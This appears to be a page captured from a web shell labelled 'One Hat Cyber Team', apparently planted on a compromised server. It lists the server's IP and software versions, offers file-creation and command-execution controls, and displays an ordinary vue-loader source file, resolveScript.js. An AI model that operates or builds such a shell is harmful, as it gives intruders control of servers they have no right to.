⚝
One Hat Cyber Team
⚝
Your IP:
216.73.216.1
Server IP:
185.238.29.86
Server:
Linux server2 6.8.12-6-pve #1 SMP PREEMPT_DYNAMIC PMX 6.8.12-6 (2024-12-19T19:05Z) x86_64
Server Software:
nginx/1.18.0
PHP Version:
8.1.31
Buat File
|
Buat Folder
Eksekusi
Dir :
~
/
var
/
www
/
invoice
/
node_modules
/
vue-loader
/
lib
/
View File Name :
resolveScript.js
const { resolveCompiler } = require('./compiler') const clientCache = new WeakMap() const serverCache = new WeakMap() exports.resolveScript = function resolveScript( descriptor, scopeId, options, loaderContext ) { if (!descriptor.script && !descriptor.scriptSetup) { return null } const { compiler } = resolveCompiler(loaderContext.rootContext, loaderContext) if (!compiler.compileScript) { if (descriptor.scriptSetup) { loaderContext.emitError( 'The version of Vue you are using does not support <script setup>. ' + 'Please upgrade to 2.7 or above.' ) } return descriptor.script } const isProd = loaderContext.mode === 'production' || process.env.NODE_ENV === 'production' const isServer = options.optimizeSSR || loaderContext.target === 'node' const cacheToUse = isServer ? serverCache : clientCache const cached = cacheToUse.get(descriptor) if (cached) { return cached } let resolved = null try { resolved = compiler.compileScript(descriptor, { id: scopeId, isProd, babelParserPlugins: options.babelParserPlugins }) } catch (e) { loaderContext.emitError(e) } cacheToUse.set(descriptor, resolved) return resolved }